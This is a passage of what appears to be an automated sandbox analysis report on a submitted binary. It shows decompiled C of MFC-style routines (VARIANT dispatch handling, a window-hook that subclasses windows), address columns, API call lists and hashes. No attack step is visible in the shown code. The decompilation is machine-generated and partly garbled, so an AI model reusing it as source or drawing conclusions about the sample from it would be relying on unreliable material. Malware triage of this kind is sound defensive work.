                                                      							E00403115(_t257, _t293, _t295, _t321);
                                                      							L50:
                                                      							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
                                                      							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
                                                      								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
                                                      							}
                                                      							_t211 = E00402EE1(_t322, 0x20);
                                                      							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
                                                      							_t323 = _t211 - _t257;
                                                      							 *(_t300 - 4) = 4;
                                                      							if(_t211 != _t257) {
                                                      								_push( *((intOrPtr*)(_t300 - 0x88)));
                                                      								_push(_t257);
                                                      								_push(_t257);
                                                      								_t257 = E0041C157(_t257, _t211, _t293, _t295, _t323);
                                                      							}
                                                      							_push( *((intOrPtr*)(_t300 - 0x84)));
                                                      							_t293 = __imp__#7;
                                                      							 *(_t300 - 4) = 1;
                                                      							if( *_t293() != 0) {
                                                      								_t139 = _t257 + 0x18; // 0x18
                                                      								E0040342E(_t139,  *((intOrPtr*)(_t300 - 0x84)));
                                                      							}
                                                      							_t296 = __imp__#6;
                                                      							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
                                                      							_push( *((intOrPtr*)(_t300 - 0x80)));
                                                      							if( *_t293() != 0) {
                                                      								_t143 = _t257 + 0xc; // 0xc
                                                      								E0040342E(_t143,  *((intOrPtr*)(_t300 - 0x80)));
                                                      							}
                                                      							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
                                                      							_push( *((intOrPtr*)(_t300 - 0x7c)));
                                                      							if( *_t293() != 0) {
                                                      								_t147 = _t257 + 0x14; // 0x14
                                                      								E0040342E(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
                                                      							}
                                                      							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
                                                      							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
                                                      							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
                                                      							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
                                                      							E0041F7F4(_t300 + 0x14, 0x43ef68);
                                                      							goto L61;
                                                      						}
                                                      						__imp__#9(_t300 - 0x44);
                                                      						_t321 =  *(_t300 + 0xc) - 0x80020009;
                                                      						if( *(_t300 + 0xc) == 0x80020009) {
                                                      							goto L50;
                                                      						}
                                                      						_push( *(_t300 + 0xc));
                                                      						goto L49;
                                                      					} else {
                                                      						_t295 =  *(_t300 + 0x18);
                                                      						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
                                                      						while(1) {
                                                      							_t319 =  *_t295;
                                                      							if( *_t295 == 0) {
                                                      								goto L46;
                                                      							}
                                                      							_t230 =  *_t295;
                                                      							__eflags = _t230 - 8;
                                                      							if(_t230 == 8) {
                                                      								L43:
                                                      								__imp__#9(_t293);
                                                      								L44:
                                                      								_t293 = _t293 - 0x10;
                                                      								_t295 =  &(_t295[1]);
                                                      								__eflags = _t295;
                                                      								continue;
                                                      							}
                                                      							__eflags = _t230 - 0xe;
                                                      							if(_t230 != 0xe) {
                                                      								goto L44;
                                                      							}
                                                      							goto L43;
                                                      						}
                                                      						goto L46;
                                                      					}
                                                      				} else {
                                                      					_t290 = 0x10;
                                                      					_t297 = E00402EE1(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
                                                      					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
                                                      					E0041F330(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
                                                      					_t236 =  *(_t300 + 0x18);
                                                      					_t277 =  *(_t300 - 0x4c) << 4;
                                                      					_t302 = _t302 + 0x10;
                                                      					_t36 = _t277 - 0x10; // -16
                                                      					_t278 = _t297 + _t36;
                                                      					 *(_t300 - 0x14) = _t236;
                                                      					 *(_t300 - 0x10) = _t278;
                                                      					if( *_t236 == 0) {
                                                      						goto L37;
                                                      					}
                                                      					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
                                                      					_t299 =  &(_t278[4]);
                                                      					_t258 = _t237 - 4;
                                                      					 *(_t300 - 0x1c) = _t299;
                                                      					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
                                                      					do {
                                                      						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
                                                      						_t279 =  *(_t300 - 0x10);
                                                      						 *_t279 = _t240;
                                                      						if((_t240 & 0x00000040) != 0) {
                                                      							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
                                                      						}
                                                      						_t241 =  *_t279 & 0x0000ffff;
                                                      						_t313 = _t241 - 0x4002;
                                                      						if(_t313 > 0) {
                                                      							_t242 = _t241 - 0x4003;
                                                      							__eflags = _t242 - 0x12;
                                                      							if(__eflags > 0) {
                                                      								goto L35;
                                                      							}
                                                      							switch( *((intOrPtr*)(_t242 * 4 +  &M0041CC9B))) {
                                                      								case 0:
                                                      									goto L34;
                                                      								case 1:
                                                      									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                      									_t258 = _t258 + _t293;
                                                      									_t244 =  *_t258;
                                                      									asm("sbb ecx, ecx");
                                                      									 *_t244 =  ~( *_t244) & 0x0000ffff;
                                                      									 *_t299 = _t244;
                                                      									_t245 = E0041B66F(_t300 - 0x34, _t244, _t244, 0);
                                                      									 *(_t300 - 4) = 3;
                                                      									E0041BA91(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
                                                      									__eflags =  *(_t300 - 0x2c);
                                                      									 *(_t300 - 4) = 1;
                                                      									if(__eflags != 0) {
                                                      										_push( *((intOrPtr*)(_t300 - 0x34)));
                                                      										E00402F0C(_t258, _t293, _t299, __eflags);
                                                      									}
                                                      									goto L35;
                                                      								case 2:
                                                      									goto L35;
                                                      							}
                                                      						} else {
                                                      							if(_t313 == 0) {
                                                      								L34:
                                                      								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                      								_t258 = _t258 + _t293;
                                                      								__eflags = _t258;
                                                      								 *_t299 =  *_t258;
                                                      								goto L35;
                                                      							}
                                                      							_t250 = _t241;
                                                      							if(_t250 > 0x13) {
                                                      								goto L35;
                                                      							}
                                                      							switch( *((intOrPtr*)(_t250 * 4 +  &M0041CC4B))) {
                                                      								case 0:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                      									__ebx = __ebx + __edi;
                                                      									__ax =  *__ebx;
                                                      									goto L28;
                                                      								case 1:
                                                      									goto L34;
                                                      								case 2:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                      									__eax =  *(__ebp + 0x1c);
                                                      									__ebx =  &(__ebx[2]);
                                                      									 *__esi =  *( *(__ebp + 0x1c));
                                                      									goto L35;
                                                      								case 3:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                      									__eax =  *(__ebp + 0x1c);
                                                      									__ebx =  &(__ebx[2]);
                                                      									 *__esi =  *( *(__ebp + 0x1c));
                                                      									goto L35;
                                                      								case 4:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                      									__ebx = __ebx + __edi;
                                                      									__eax =  *__ebx;
                                                      									goto L17;
                                                      								case 5:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                      									__ebx = __ebx + __edi;
                                                      									__eax =  *__ebx;
                                                      									_push(__eax);
                                                      									 *(__ebp - 0x1c) = __eax;
                                                      									__imp__#2();
                                                      									__eflags =  *(__ebp - 0x1c);
                                                      									 *__esi = __eax;
                                                      									if(__eflags == 0) {
                                                      										goto L35;
                                                      									}
                                                      									__eflags = __eax;
                                                      									if(__eflags != 0) {
                                                      										goto L35;
                                                      									}
                                                      									goto L23;
                                                      								case 6:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                      									__ebx = __ebx + __edi;
                                                      									 *__ebx =  ~( *__ebx);
                                                      									asm("sbb eax, eax");
                                                      									L28:
                                                      									 *__esi = __ax;
                                                      									goto L35;
                                                      								case 7:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
                                                      									__edi =  *(__ebp - 0x10);
                                                      									__ebx =  &(__ebx[1]);
                                                      									__esi =  *__ebx;
                                                      									asm("movsd");
                                                      									asm("movsd");
                                                      									asm("movsd");
                                                      									asm("movsd");
                                                      									__esi =  *(__ebp - 0x1c);
                                                      									_push(4);
                                                      									_pop(__edi);
                                                      									goto L35;
                                                      								case 8:
                                                      									L24:
                                                      									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                      									__ebx = __ebx + __edi;
                                                      									__eax =  *__ebx;
                                                      									_push(__eax);
                                                      									__ecx = __ebp - 0x18;
                                                      									 *(__ebp - 0x1c) = __eax;
                                                      									__eax = E004036AB(__ebx, __ecx, __edi, __esi, __eflags);
                                                      									_push( *(__ebp - 0x18));
                                                      									 *((char*)(__ebp - 4)) = 2;
                                                      									__imp__#2();
                                                      									__eflags =  *(__ebp - 0x1c);
                                                      									 *__esi = __eax;
                                                      									if( *(__ebp - 0x1c) == 0) {
                                                      										L26:
                                                      										__ecx =  *(__ebp - 0x18);
                                                      										__eax =  *(__ebp - 0x10);
                                                      										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
                                                      										 *( *(__ebp - 0x10)) = 8;
                                                      										 *((char*)(__ebp - 4)) = 1;
                                                      										__eax = E00403036(__ecx, __edx);
                                                      										goto L35;
                                                      									}
                                                      									__eflags = __eax;
                                                      									if(__eflags == 0) {
                                                      										L23:
                                                      										__eax = E004037AF(__ebx, __ecx, __edi, __esi, __eflags);
                                                      										goto L24;
                                                      									}
                                                      									goto L26;
                                                      								case 9:
                                                      									goto L35;
                                                      								case 0xa:
                                                      									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                      									_t258 = _t258 + _t293;
                                                      									 *_t299 =  *_t258;
                                                      									goto L35;
                                                      								case 0xb:
                                                      									__eax =  *(__ebp + 0x1c);
                                                      									__eax =  *(__ebp + 0x1c) + 8;
                                                      									 *(__ebp + 0x1c) = __eax;
                                                      									__ebx =  &(__ebx[2]);
                                                      									__eflags = __ebx;
                                                      									L17:
                                                      									__ecx =  *__eax;
                                                      									 *__esi = __ecx;
                                                      									 *(__esi + 4) = __eax;
                                                      									goto L35;
                                                      							}
                                                      						}
                                                      						L35:
                                                      						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
                                                      						_t299 = _t299 - 0x10;
                                                      						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
                                                      						 *(_t300 - 0x1c) = _t299;
                                                      					} while ( *( *(_t300 - 0x14)) != 0);
                                                      					_t257 = 0;
                                                      					goto L37;
                                                      				}
                                                      			}































                                                      0x0041cbf4
                                                      0x0041cbf7
                                                      0x00000000
                                                      0x00000000
                                                      0x0041cbff
                                                      0x0041cc02
                                                      0x0041cc04
                                                      0x0041cc08
                                                      0x0041cc0b
                                                      0x00000000
                                                      0x00000000
                                                      0x0041cc0f
                                                      0x0041cc12
                                                      0x0041cc15
                                                      0x0041cc16
                                                      0x0041cc17
                                                      0x0041cc18
                                                      0x0041cc19
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041cbb5
                                                      0x00000000
                                                      0x00000000
                                                      0x0041cba8
                                                      0x0041cb7c
                                                      0x0041cb81
                                                      0x0041cb87
                                                      0x0041cb89
                                                      0x0041cb8b
                                                      0x00000000
                                                      0x00000000
                                                      0x0041cb91
                                                      0x0041cb97
                                                      0x0041caaf
                                                      0x0041caaf
                                                      0x0041cab4
                                                      0x0041cab4
                                                      0x0041cab7
                                                      0x0041cac0
                                                      0x0041cac0
                                                      0x0041cac5
                                                      0x0041cacb
                                                      0x0041cace
                                                      0x0041cad0
                                                      0x0041cad4
                                                      0x0041cad6
                                                      0x0041cade
                                                      0x0041cadf
                                                      0x0041cae5
                                                      0x0041cae5
                                                      0x0041cae7
                                                      0x0041caed
                                                      0x0041caf3
                                                      0x0041cafb
                                                      0x0041cb03
                                                      0x0041cb06
                                                      0x0041cb06
                                                      0x0041cb11
                                                      0x0041cb17
                                                      0x0041cb19
                                                      0x0041cb20
                                                      0x0041cb25
                                                      0x0041cb28
                                                      0x0041cb28
                                                      0x0041cb30
                                                      0x0041cb32
                                                      0x0041cb39
                                                      0x0041cb3e
                                                      0x0041cb41
                                                      0x0041cb41
                                                      0x0041cb49
                                                      0x0041cb4e
                                                      0x0041cb54
                                                      0x0041cb60
                                                      0x0041cb63
                                                      0x00000000
                                                      0x0041cb63
                                                      0x0041ca9d
                                                      0x0041caa3
                                                      0x0041caaa
                                                      0x00000000
                                                      0x00000000
                                                      0x0041caac
                                                      0x00000000
                                                      0x0041ca5b
                                                      0x0041ca5e
                                                      0x0041ca64
                                                      0x0041ca7f
                                                      0x0041ca7f
                                                      0x0041ca82
                                                      0x00000000
                                                      0x00000000
                                                      0x0041ca6a
                                                      0x0041ca6c
                                                      0x0041ca6e
                                                      0x0041ca74
                                                      0x0041ca75
                                                      0x0041ca7b
                                                      0x0041ca7b
                                                      0x0041ca7e
                                                      0x0041ca7e
                                                      0x00000000
                                                      0x0041ca7e
                                                      0x0041ca70
                                                      0x0041ca72
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041ca72
                                                      0x00000000
                                                      0x0041ca7f
                                                      0x0041c7de
                                                      0x0041c7e2
                                                      0x0041c7f2
                                                      0x0041c7fd
                                                      0x0041c800
                                                      0x0041c808
                                                      0x0041c80b
                                                      0x0041c80e
                                                      0x0041c814
                                                      0x0041c814
                                                      0x0041c818
                                                      0x0041c81b
                                                      0x0041c81e
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c824
                                                      0x0041c829
                                                      0x0041c82c
                                                      0x0041c832
                                                      0x0041c835
                                                      0x0041c838
                                                      0x0041c83b
                                                      0x0041c841
                                                      0x0041c844
                                                      0x0041c847
                                                      0x0041c851
                                                      0x0041c851
                                                      0x0041c854
                                                      0x0041c85c
                                                      0x0041c85e
                                                      0x0041c97b
                                                      0x0041c980
                                                      0x0041c983
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c985
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c98c
                                                      0x0041c98f
                                                      0x0041c991
                                                      0x0041c997
                                                      0x0041c9a1
                                                      0x0041c9a8
                                                      0x0041c9aa
                                                      0x0041c9b6
                                                      0x0041c9ba
                                                      0x0041c9bf
                                                      0x0041c9c3
                                                      0x0041c9c7
                                                      0x0041c9c9
                                                      0x0041c9cc
                                                      0x0041c9d1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c864
                                                      0x0041c864
                                                      0x0041c9d4
                                                      0x0041c9d4
                                                      0x0041c9d7
                                                      0x0041c9d7
                                                      0x0041c9db
                                                      0x00000000
                                                      0x0041c9db
                                                      0x0041c86b
                                                      0x0041c86f
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c875
                                                      0x00000000
                                                      0x0041c88a
                                                      0x0041c88d
                                                      0x0041c88f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c8b2
                                                      0x0041c8b6
                                                      0x0041c8bb
                                                      0x0041c8be
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c8c5
                                                      0x0041c8c9
                                                      0x0041c8ce
                                                      0x0041c8d1
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c8d8
                                                      0x0041c8db
                                                      0x0041c8dd
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c8e1
                                                      0x0041c8e4
                                                      0x0041c8e6
                                                      0x0041c8e8
                                                      0x0041c8e9
                                                      0x0041c8ec
                                                      0x0041c8f2
                                                      0x0041c8f6
                                                      0x0041c8f8
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c8fe
                                                      0x0041c900
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c953
                                                      0x0041c956
                                                      0x0041c95a
                                                      0x0041c95c
                                                      0x0041c95e
                                                      0x0041c95e
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c963
                                                      0x0041c967
                                                      0x0041c96a
                                                      0x0041c96d
                                                      0x0041c96f
                                                      0x0041c970
                                                      0x0041c971
                                                      0x0041c972
                                                      0x0041c973
                                                      0x0041c976
                                                      0x0041c978
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c90b
                                                      0x0041c90b
                                                      0x0041c90e
                                                      0x0041c910
                                                      0x0041c912
                                                      0x0041c913
                                                      0x0041c916
                                                      0x0041c919
                                                      0x0041c91e
                                                      0x0041c921
                                                      0x0041c925
                                                      0x0041c92b
                                                      0x0041c92f
                                                      0x0041c931
                                                      0x0041c937
                                                      0x0041c937
                                                      0x0041c93a
                                                      0x0041c93d
                                                      0x0041c940
                                                      0x0041c945
                                                      0x0041c949
                                                      0x00000000
                                                      0x0041c949
                                                      0x0041c933
                                                      0x0041c935
                                                      0x0041c906
                                                      0x0041c906
                                                      0x00000000
                                                      0x0041c906
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c87c
                                                      0x0041c87f
                                                      0x0041c883
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c897
                                                      0x0041c89a
                                                      0x0041c89d
                                                      0x0041c8a0
                                                      0x0041c8a0
                                                      0x0041c8a3
                                                      0x0041c8a3
                                                      0x0041c8a5
                                                      0x0041c8aa
                                                      0x00000000
                                                      0x00000000
                                                      0x0041c875
                                                      0x0041c9dd
                                                      0x0041c9dd
                                                      0x0041c9e1
                                                      0x0041c9e4
                                                      0x0041c9ed
                                                      0x0041c9ed
                                                      0x0041c9f6
                                                      0x00000000
                                                      0x0041c9f6

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                      • String ID: XpC
                                                      • API String ID: 4128688680-1560596422
                                                      • Opcode ID: be4c868b454149c2b2600008163556171ca705d1456a4cebcd2cc0c5bfb6c5b4
                                                      • Instruction ID: 96ace918a2bd9a0f0a8ad0f941851b9479455dd266bf0f0d67035f332fcd63c4
                                                      • Opcode Fuzzy Hash: be4c868b454149c2b2600008163556171ca705d1456a4cebcd2cc0c5bfb6c5b4
                                                      • Instruction Fuzzy Hash: 93F19AB1940209DFDF10DFA8CC84AEEBBB5EF05304F14406AE815AB291D7789E92CF59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E0040B4F5(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr _t54;
                                                      				void* _t55;
                                                      				signed int _t56;
                                                      				void* _t59;
                                                      				long _t60;
                                                      				signed int _t64;
                                                      				void* _t66;
                                                      				short _t72;
                                                      				signed int _t74;
                                                      				signed int _t76;
                                                      				long _t83;
                                                      				signed int _t86;
                                                      				signed short _t87;
                                                      				signed int _t88;
                                                      				int _t94;
                                                      				void* _t106;
                                                      				long* _t108;
                                                      				long _t110;
                                                      				signed int _t111;
                                                      				CHAR* _t112;
                                                      				intOrPtr _t113;
                                                      				void* _t116;
                                                      				void* _t119;
                                                      				intOrPtr _t120;
                                                      
                                                      				_t119 = __eflags;
                                                      				_t105 = __edi;
                                                      				_push(0x148);
                                                      				E0041F753(E00432474, __ebx, __edi, __esi);
                                                      				_t110 =  *(_t116 + 0x10);
                                                      				_t94 =  *(_t116 + 0xc);
                                                      				_push(0x4037fd);
                                                      				 *(_t116 - 0x120) = _t110;
                                                      				_t54 = E0040F584(_t94, 0x44642c, __edi, _t110, _t119);
                                                      				_t120 = _t54;
                                                      				_t97 = 0 | _t120 == 0x00000000;
                                                      				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
                                                      				_t121 = _t120 == 0;
                                                      				if(_t120 == 0) {
                                                      					_t54 = E004037E3(_t94, _t97, __edi, _t110, _t121);
                                                      				}
                                                      				if( *(_t116 + 8) == 3) {
                                                      					_t106 =  *_t110;
                                                      					_t111 =  *(_t54 + 0x14);
                                                      					_t55 = E0040DB94(_t94, _t106, _t111, __eflags);
                                                      					__eflags = _t111;
                                                      					_t56 =  *(_t55 + 0x14) & 0x000000ff;
                                                      					 *(_t116 - 0x124) = _t56;
                                                      					if(_t111 != 0) {
                                                      						L7:
                                                      						__eflags =  *0x446804;
                                                      						if( *0x446804 == 0) {
                                                      							L12:
                                                      							__eflags = _t111;
                                                      							if(__eflags == 0) {
                                                      								__eflags =  *0x44640c;
                                                      								if( *0x44640c != 0) {
                                                      									L19:
                                                      									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x44640c; // 0x8000
                                                      									if(__eflags != 0) {
                                                      										L23:
                                                      										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                                                      										__eflags = _t59;
                                                      										 *(_t116 - 0x14) = _t59;
                                                      										if(_t59 != 0) {
                                                      											_t112 = "AfxOldWndProc423";
                                                      											_t64 = GetPropA(_t94, _t112);
                                                      											__eflags = _t64;
                                                      											if(_t64 == 0) {
                                                      												SetPropA(_t94, _t112,  *(_t116 - 0x14));
                                                      												_t66 = GetPropA(_t94, _t112);
                                                      												__eflags = _t66 -  *(_t116 - 0x14);
                                                      												if(_t66 ==  *(_t116 - 0x14)) {
                                                      													GlobalAddAtomA(_t112);
                                                      													SetWindowLongA(_t94, 0xfffffffc, E0040B3B1);
                                                      												}
                                                      											}
                                                      										}
                                                      										L27:
                                                      										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
                                                      										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
                                                      										__eflags =  *(_t116 - 0x124);
                                                      										_t110 = _t60;
                                                      										if( *(_t116 - 0x124) != 0) {
                                                      											UnhookWindowsHookEx( *(_t105 + 0x28));
                                                      											_t50 = _t105 + 0x28;
                                                      											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
                                                      											__eflags =  *_t50;
                                                      										}
                                                      										goto L30;
                                                      									}
                                                      									goto L27;
                                                      								}
                                                      								_t113 = 0x30;
                                                      								E0041F330(_t106, _t116 - 0x154, 0, _t113);
                                                      								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
                                                      								_push(_t116 - 0x154);
                                                      								_push("#32768");
                                                      								_push(0);
                                                      								_t72 = E0040875E(_t94, _t97, _t106, "#32768", __eflags);
                                                      								__eflags = _t72;
                                                      								 *0x44640c = _t72;
                                                      								if(_t72 == 0) {
                                                      									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
                                                      									__eflags = _t74;
                                                      									if(_t74 == 0) {
                                                      										goto L23;
                                                      									}
                                                      									 *((char*)(_t116 - 0x19)) = 0;
                                                      									_t76 = E0042158D(_t116 - 0x118, "#32768");
                                                      									__eflags = _t76;
                                                      									if(_t76 == 0) {
                                                      										goto L27;
                                                      									}
                                                      									goto L23;
                                                      								}
                                                      								goto L19;
                                                      							}
                                                      							E0040DBE0(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
                                                      							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
                                                      							E00409CD8(_t111, _t116, _t94);
                                                      							 *((intOrPtr*)( *_t111 + 0x50))();
                                                      							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
                                                      							_t83 = SetWindowLongA(_t94, 0xfffffffc, E0040A3D5);
                                                      							__eflags = _t83 - E0040A3D5;
                                                      							if(_t83 != E0040A3D5) {
                                                      								 *_t108 = _t83;
                                                      							}
                                                      							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
                                                      							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
                                                      							__eflags =  *(_t116 - 0x14);
                                                      							if( *(_t116 - 0x14) != 0) {
                                                      								_push( *(_t116 - 0x18));
                                                      								_push(0);
                                                      								E0040D3B7();
                                                      							}
                                                      							goto L27;
                                                      						}
                                                      						_t86 = GetClassLongA(_t94, 0xffffffe6);
                                                      						__eflags = _t86 & 0x00010000;
                                                      						if((_t86 & 0x00010000) != 0) {
                                                      							goto L27;
                                                      						}
                                                      						_t87 =  *(_t106 + 0x28);
                                                      						__eflags = _t87 - 0xffff;
                                                      						if(_t87 <= 0xffff) {
                                                      							 *(_t116 - 0x18) = 0;
                                                      							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
                                                      							_t87 = _t116 - 0x18;
                                                      						}
                                                      						_t88 = E00403EE9(_t87, "ime");
                                                      						__eflags = _t88;
                                                      						_pop(_t97);
                                                      						if(_t88 == 0) {
                                                      							goto L27;
                                                      						}
                                                      						goto L12;
                                                      					}
                                                      					__eflags =  *(_t106 + 0x20) & 0x40000000;
                                                      					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
                                                      						goto L27;
                                                      					}
                                                      					__eflags = _t56;
                                                      					if(_t56 != 0) {
                                                      						goto L27;
                                                      					}
                                                      					goto L7;
                                                      				} else {
                                                      					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
                                                      					L30:
                                                      					return E0041F7D6(_t94, _t105, _t110);
                                                      				}
                                                      			}




























                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 0040B4FF
                                                        • Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B
                                                      • CallNextHookEx.USER32(?,?,?,?), ref: 0040B543
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      • GetClassLongA.USER32 ref: 0040B587
                                                      • GlobalGetAtomNameA.KERNEL32 ref: 0040B5B1
                                                      • SetWindowLongA.USER32 ref: 0040B606
                                                      • _memset.LIBCMT ref: 0040B650
                                                      • GetClassLongA.USER32 ref: 0040B680
                                                      • GetClassNameA.USER32(?,?,00000100), ref: 0040B6A1
                                                      • GetWindowLongA.USER32 ref: 0040B6C5
                                                      • GetPropA.USER32 ref: 0040B6DF
                                                      • SetPropA.USER32 ref: 0040B6EA
                                                      • GetPropA.USER32 ref: 0040B6F2
                                                      • GlobalAddAtomA.KERNEL32 ref: 0040B6FA
                                                      • SetWindowLongA.USER32 ref: 0040B708
                                                      • CallNextHookEx.USER32(?,00000003,?,?), ref: 0040B720
                                                      • UnhookWindowsHookEx.USER32(?), ref: 0040B734
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                      • String ID: #32768$,dD$AfxOldWndProc423$ime
                                                      • API String ID: 1191297049-714433792
                                                      • Opcode ID: e9e9e0e71ff52e961d457ae236bb709206b0a3f776dbbf9ceb3bb5f2ba91c0c6
                                                      • Instruction ID: 84e3f26e1d5758fcd2ef64f535b58e951b2309da213ef0e04ba7174f59460a39
                                                      • Opcode Fuzzy Hash: e9e9e0e71ff52e961d457ae236bb709206b0a3f776dbbf9ceb3bb5f2ba91c0c6
                                                      • Instruction Fuzzy Hash: 44619071900219ABDB209B61DD49BEB7BB8EF44325F100576F905B32D1C7389A81CBDD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E00407777() {
                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				struct HINSTANCE__* _t5;
                                                      				_Unknown_base(*)()* _t6;
                                                      				_Unknown_base(*)()* _t7;
                                                      				_Unknown_base(*)()* _t8;
                                                      				_Unknown_base(*)()* _t9;
                                                      				_Unknown_base(*)()* _t10;
                                                      				_Unknown_base(*)()* _t11;
                                                      				_Unknown_base(*)()* _t12;
                                                      				struct HINSTANCE__* _t18;
                                                      				void* _t20;
                                                      				intOrPtr _t23;
                                                      				_Unknown_base(*)()* _t24;
                                                      
                                                      				_t23 =  *0x44629c; // 0x0
                                                      				if(_t23 == 0) {
                                                      					_push(_t20);
                                                      					 *0x4462a0 = E0040771F(0, _t20, __eflags);
                                                      					_t18 = GetModuleHandleA("USER32");
